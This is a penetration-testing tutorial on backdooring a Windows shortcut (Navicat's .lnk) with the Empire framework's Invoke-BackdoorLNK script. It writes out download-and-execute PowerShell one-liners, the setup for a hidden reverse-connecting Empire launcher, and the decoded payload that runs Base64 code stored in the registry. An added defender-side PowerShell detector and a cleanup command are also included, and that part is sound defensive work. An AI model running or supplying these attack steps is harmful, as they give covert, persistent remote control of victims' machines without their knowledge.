Every time the user runs a particular shortcut (.lnk) file after boot, a piece of malicious PowerShell code is triggered; the original application still starts, the original icon is preserved, and no powershell.exe window pops up.
1. Installing the backdoor
This time we use the PowerShell attack framework Empire, specifically the script Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/persistence/Invoke-BackdoorLNK.ps1'); Invoke-BackdoorLNK -LNKPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PremiumSoft\Navicat Premium\Navicat Premium.lnk' -EncScript <Base64-encoded script>"
-LNKPath is the path of the .lnk file to hijack. Every time this .lnk file is opened, both the original application and the malicious PowerShell code given after -EncScript are executed.
First, generate the reverse-connection PowerShell launcher with Empire:
./empire            (start Empire)
listeners           (enter the listener menu and set the IP and port)
set Host http://192.168.1.150
set Port 8080
launcher 1          (generate the PowerShell launcher code)
powershell.exe -NoP -sta -NonI -W Hidden -Enc
Here we copy only the Base64 string that follows -Enc.
Then run:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/persistence/Invoke-BackdoorLNK.ps1'); Invoke-BackdoorLNK -LNKPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PremiumSoft\Navicat Premium\Navicat Premium.lnk' -EncScript <Base64 launcher string copied from the -Enc argument above>"
Seeing the output above means the backdoor has been installed.
When we run the Navicat shortcut, powershell.exe can be seen quietly connecting back to Empire at the same time.
2. How it works
The script changes the shortcut's original target to the path of powershell.exe, and then uses PowerShell to launch the Navicat program together with the malicious code.
Decoded code:
[System.Diagnostics.Process]::Start('D:\Navicat Premium\navicat.exe'); IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\debug).debug)))
When the shortcut is clicked, the shortcut's original target is launched first; then the value of HKCU:\Software\Microsoft\Windows\debug is read from the registry and executed (when the backdoor was installed, the code to be executed was Base64-encoded and stored in HKCU:\Software\Microsoft\Windows\debug).
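As an added defender-side example (not code from the original post or from Empire), the following PowerShell checks for the two artifacts this section describes: a Start Menu or Desktop shortcut whose target now points at a script host such as powershell.exe with an -Enc argument, and the HKCU:\Software\Microsoft\Windows\debug value that holds the second stage. The search roots and function names are my assumptions; it must run as the user whose shortcuts and HKCU hive are being inspected.

```powershell
function Find-HijackedLnk {
    param(
        [string[]]$Roots = @(
            "$env:ProgramData\Microsoft\Windows\Start Menu\Programs",
            "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
            "$env:USERPROFILE\Desktop"
        )
    )
    $shell = New-Object -ComObject WScript.Shell
    foreach ($lnk in Get-ChildItem -Path $Roots -Filter *.lnk -Recurse -ErrorAction SilentlyContinue) {
        $sc = $shell.CreateShortcut($lnk.FullName)
        # A legitimate shortcut points at the application; a hijacked one points at a script host
        if ($sc.TargetPath -notmatch '(?i)\\(powershell|pwsh|cmd|wscript|cscript|mshta)\.exe$') { continue }
        $decoded = $null
        if ($sc.Arguments -match '(?i)-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})') {
            try {
                # -Enc payloads are UTF-16LE, so decode with Unicode rather than ASCII
                $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
            } catch { $decoded = '<not valid Base64>' }
        }
        [pscustomobject]@{
            Shortcut  = $lnk.FullName
            Target    = $sc.TargetPath
            Arguments = $sc.Arguments
            Decoded   = $decoded
            Icon      = $sc.IconLocation   # usually still the real app's icon, as the post notes
        }
    }
}

function Get-LnkBackdoorRegistryValue {
    # The decoded shortcut payload reads its second stage from this value (see above)
    $key = 'HKCU:\Software\Microsoft\Windows\debug'
    if (-not (Test-Path $key)) { return $null }
    $raw = (Get-ItemProperty -Path $key -Name debug -ErrorAction SilentlyContinue).debug
    if (-not $raw) { return $null }
    try { [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($raw)) } catch { $raw }
}

Find-HijackedLnk | Format-List
Get-LnkBackdoorRegistryValue
```

A flagged shortcut is remediated by restoring its original target (the -CleanUp switch in the next section does this for shortcuts the script modified) and deleting the registry value, after which the Decoded field is useful for identifying the listener the payload was contacting.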
3. Removing the backdoor
Run the following command to remove the backdoor:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/persistence/Invoke-BackdoorLNK.ps1'); Invoke-BackdoorLNK -LNKPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PremiumSoft\Navicat Premium\Navicat Premium.lnk' -CleanUp"
4. Summary
Attacking through shortcuts is an old topic, but when adding a startup item, service, or scheduled task fails during a penetration test, this method can be tried: hijack the shortcut of a frequently used program to maintain access. PowerShell-based attack techniques on Windows will only keep getting more powerful.